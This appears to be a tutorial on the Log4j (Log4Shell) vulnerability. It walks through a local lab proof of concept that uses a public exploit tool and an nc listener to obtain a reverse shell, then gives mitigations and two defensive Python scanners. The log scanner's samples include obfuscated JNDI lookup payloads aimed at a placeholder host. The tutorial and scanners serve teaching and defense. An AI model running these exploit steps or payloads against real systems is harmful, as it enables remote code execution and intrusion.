Image Source: https://thehackernews.com/2021/12/apache-log4j-vulnerability-log4shell.html
The Log4j vulnerability is a critical remote code execution (RCE) vulnerability in the Apache Log4j logging library. It was first disclosed on December 9, 2021, and is considered to be one of the most serious software vulnerabilities ever discovered.
The vulnerability exists in the way that Log4j processes certain types of log messages. An attacker can exploit this vulnerability by sending a specially crafted log message to a vulnerable system. This message can then be used to execute arbitrary code on the system.
The Log4j vulnerability affects a wide range of software, including many popular applications and services. Some of the known victims of the vulnerability include Minecraft, Amazon Web Services, Cisco, and VMware.
Requirements
– Exploit tool (https://github.com/kozmer/log4j-shell-poc)
– Vulnerable JDK version
– Victim endpoint
– Attacker endpoint (optional)
Now let's build a PoC showing how this vulnerability is exploited.
Download the tool:
git clone https://github.com/kozmer/log4j-shell-poc
Then install the Python dependencies listed in requirements.txt:
pip install -r requirements.txt
Install Docker so we can fetch the vulnerable application:
sudo snap install docker
Now go into the folder of the exploit tool we downloaded and build the vulnerable Docker image from it.
Check that the image is listed by docker images.
Then run the image so the vulnerable application is up:
docker run --network host log4j-shell-poc
Then open localhost:8080 and confirm that the application is up.
Now download one of the older JDK versions; I used jdk-8u20-linux.
Move the JDK into the exploit tool's folder:
mv jdk-8u20-linux-x64.tar.gz /home/ali/Desktop/log4j-shell-poc-main
Then extract the tar file:
tar -xf jdk-8u20-linux-x64.tar.gz
Now run the poc.py script with the necessary parameters:
python3 poc.py --userip localhost --webport 8000 --lport 9001
Paste the line printed by the script into the application running on localhost.
Before clicking the Login button, start the listener:
nc -lvnp 9001
Then, when we click the Login button, we obtain a reverse shell.
How to Protect Against the Log4j Vulnerability?
- Upgrade to the latest version of Log4j. The vulnerability has been patched in Log4j version 2.15.0 and later, so upgrading to the latest version is the best way to protect yourself.
- Disable JNDI lookups. If you are unable to upgrade to the latest version of Log4j, you can disable JNDI lookups in your Log4j configuration. This will prevent attackers from exploiting the vulnerability.
- Implement a web application firewall (WAF). A WAF can be used to block malicious requests that are trying to exploit the Log4j vulnerability.
- Monitor your systems for suspicious activity. Even if you have taken all of the above steps, it is still important to monitor your systems for suspicious activity. This will help you to detect and respond to any attacks that may occur.
- Identify affected systems. Determine which of your systems use Log4j. This may include web applications, server applications, and any software relying on Log4j for logging.
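The monitoring point above becomes concrete once you look at what the lookup string looks like in request logs, including the URL-encoded and nested-lookup variants that a plain search for the literal text would miss. The following Python script is an added example (not code from the post or from the log4j-shell-poc project): it normalises each log line by URL-decoding it and resolving the lower/upper and ":-" default lookups innermost-first, then flags any line that still contains a JNDI lookup. The access-log lines are constructed for the example, with lookup.example as a placeholder host.

```python
import re
from urllib.parse import unquote

# A JNDI lookup after normalisation: ${jndi:...} in any letter case.
JNDI_LOOKUP = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)
# Inner lookups used to split the word 'jndi' so a naive substring match misses it:
#   ${lower:J} / ${upper:j}   -> case conversion of the enclosed text
#   ${env:NOPE:-j} / ${::-j}  -> default-value syntax, yields the literal after ':-'
CASE_LOOKUP = re.compile(r"\$\{(lower|upper):([^${}]*)\}", re.IGNORECASE)
DEFAULT_LOOKUP = re.compile(r"\$\{[^${}]*:-([^${}]*)\}")


def normalize(text, rounds=10):
    """Undo URL encoding and resolve nested case/default lookups, innermost first.

    Each round decodes one layer; we stop early when a round changes nothing,
    and cap the rounds so a pathological input cannot loop for long.
    """
    for _ in range(rounds):
        before = text
        text = unquote(text)
        text = CASE_LOOKUP.sub(
            lambda m: m.group(2).lower() if m.group(1).lower() == "lower" else m.group(2).upper(),
            text,
        )
        text = DEFAULT_LOOKUP.sub(lambda m: m.group(1), text)
        if text == before:
            break
    return text


def is_jndi_lookup(text):
    """True if the text carries a JNDI lookup once obfuscation is stripped."""
    return JNDI_LOOKUP.search(normalize(text)) is not None


def scan_log_lines(lines):
    """Return [(1-based line number, normalised line)] for lines carrying a JNDI lookup."""
    hits = []
    for number, line in enumerate(lines, start=1):
        normalised = normalize(line)
        if JNDI_LOOKUP.search(normalised):
            hits.append((number, normalised))
    return hits


# Constructed sample access log (combined format). Lines 2-4 carry a lookup:
# plain, split with ${lower:..}, and URL-encoded with the ':-' default trick.
SAMPLE_ACCESS_LOG = [
    '203.0.113.7 - - [10/Dec/2021:10:12:01 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.8 - - [10/Dec/2021:10:12:05 +0000] "GET /login HTTP/1.1" 200 88 "-" "${jndi:ldap://lookup.example/a}"',
    '203.0.113.9 - - [10/Dec/2021:10:12:09 +0000] "GET /login HTTP/1.1" 200 88 "-" "${${lower:j}ndi:${lower:l}dap://lookup.example/a}"',
    '203.0.113.9 - - [10/Dec/2021:10:12:13 +0000] "GET /?q=%24%7B%24%7B%3A%3A-j%7Dndi%3Aldap%3A%2F%2Flookup.example%2Fa%7D HTTP/1.1" 200 88 "-" "curl/7.79"',
    '203.0.113.10 - - [10/Dec/2021:10:12:20 +0000] "GET /status HTTP/1.1" 200 40 "-" "${env:HOSTNAME}"',
]

if __name__ == "__main__":
    for number, line in scan_log_lines(SAMPLE_ACCESS_LOG):
        print(f"line {number}: {line}")
```

Run it against a real access log by replacing SAMPLE_ACCESS_LOG with the file's lines; remember that the lookup may arrive in any header or field the application logs, so scanning only the User-Agent column is not enough, and a WAF rule that looks for the literal "${jndi:" without this normalisation can be bypassed in the same ways.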
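For the last step, identifying affected systems, the practical question is which log4j-core archives on a host are older than the 2.15.0 fix the post names and still contain the JNDI lookup class. The following Python script is an added example, not code from the post or the project: it walks a directory tree, opens every .jar/.war/.ear, reads the version from the manifest's Implementation-Version header (assumed present, as Maven-built log4j-core jars carry it), checks for org/apache/logging/log4j/core/lookup/JndiLookup.class, and also descends into jars nested inside a WAR. It builds its own constructed sample tree in a temporary directory so it runs stand-alone.

```python
import io
import os
import re
import tempfile
import zipfile

# The class that implements the JNDI lookup. Deleting it from log4j-core is a
# documented stop-gap when upgrading is not possible, so its absence is treated
# as "lookup unreachable" here.
JNDI_LOOKUP_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
CORE_PREFIX = "org/apache/logging/log4j/core/"
MANIFEST = "META-INF/MANIFEST.MF"
FIXED_VERSION = (2, 15, 0)  # first fixed release named in the post
VERSION_RE = re.compile(r"^Implementation-Version:\s*(\S+)", re.MULTILINE)


def parse_version(text):
    """'2.14.1' -> (2, 14, 1); '2.0-beta9' -> (2, 0). Non-numeric suffixes are dropped."""
    parts = []
    for piece in text.split("."):
        m = re.match(r"\d+", piece)
        if not m:
            break
        parts.append(int(m.group()))
    return tuple(parts)


def classify(is_log4j_core, version, has_jndi_lookup):
    """Return a reason string if the archive is affected, else None."""
    if not is_log4j_core or not has_jndi_lookup:
        return None
    if version is None:
        return "log4j-core with JndiLookup present, version unknown: verify manually"
    if parse_version(version) < FIXED_VERSION:
        return f"log4j-core {version} is older than 2.15.0 and still ships JndiLookup"
    return None


def scan_archive(zf, label):
    """Yield (label, version, reason) for this archive and any jar nested inside it."""
    names = sorted(zf.namelist())
    is_core = any(n.startswith(CORE_PREFIX) for n in names)
    version = None
    if MANIFEST in names:
        m = VERSION_RE.search(zf.read(MANIFEST).decode("utf-8", "replace"))
        if m:
            version = m.group(1)
    reason = classify(is_core, version, JNDI_LOOKUP_CLASS in names)
    if reason:
        yield label, version, reason
    for name in names:
        if name.endswith(".jar"):  # e.g. WEB-INF/lib/*.jar bundled in a WAR
            with zipfile.ZipFile(io.BytesIO(zf.read(name))) as inner:
                yield from scan_archive(inner, f"{label}!{name}")


def find_vulnerable_jars(root):
    """Walk root and return [(path relative to root, version, reason)] for affected archives."""
    findings = []
    for dirpath, _, filenames in os.walk(root):
        for filename in sorted(filenames):
            if filename.endswith((".jar", ".war", ".ear")):
                path = os.path.join(dirpath, filename)
                with zipfile.ZipFile(path) as zf:
                    findings.extend(scan_archive(zf, os.path.relpath(path, root)))
    return findings


def _write_jar(path, version=None, with_jndi=True, core=True):
    """Write a constructed stand-in jar with just the entries the scanner looks at."""
    with zipfile.ZipFile(path, "w") as zf:
        if version:
            zf.writestr(MANIFEST, f"Manifest-Version: 1.0\nImplementation-Version: {version}\n")
        if core:
            zf.writestr(CORE_PREFIX + "Logger.class", b"")
        if with_jndi:
            zf.writestr(JNDI_LOOKUP_CLASS, b"")


def build_sample_tree(root):
    """Constructed sample: one old core jar, one fixed, one stripped, one unrelated, one nested in a WAR."""
    lib = os.path.join(root, "lib")
    os.makedirs(lib)
    _write_jar(os.path.join(lib, "log4j-core-2.14.1.jar"), "2.14.1")
    _write_jar(os.path.join(lib, "log4j-core-2.15.0.jar"), "2.15.0")
    _write_jar(os.path.join(lib, "log4j-core-2.14.1-stripped.jar"), "2.14.1", with_jndi=False)
    _write_jar(os.path.join(lib, "commons-io.jar"), "2.11.0", with_jndi=False, core=False)
    inner = io.BytesIO()
    with zipfile.ZipFile(inner, "w") as zf:
        zf.writestr(MANIFEST, "Manifest-Version: 1.0\nImplementation-Version: 2.13.3\n")
        zf.writestr(CORE_PREFIX + "Logger.class", b"")
        zf.writestr(JNDI_LOOKUP_CLASS, b"")
    with zipfile.ZipFile(os.path.join(root, "app.war"), "w") as war:
        war.writestr("WEB-INF/lib/log4j-core-2.13.3.jar", inner.getvalue())


def demo():
    """Build the sample tree in a temp dir and return the (label, version) pairs flagged."""
    with tempfile.TemporaryDirectory() as tmp:
        build_sample_tree(tmp)
        return sorted((label, version) for label, version, _ in find_vulnerable_jars(tmp))


if __name__ == "__main__":
    for label, version in demo():
        print(f"{label}: {version}")
```

Point find_vulnerable_jars at /opt, /usr/share or an application's install directory to inventory a host; the scanner only sees archives on disk, so log4j embedded in a running process's classpath from another location, or shaded into a jar under a renamed package, still needs checking by other means.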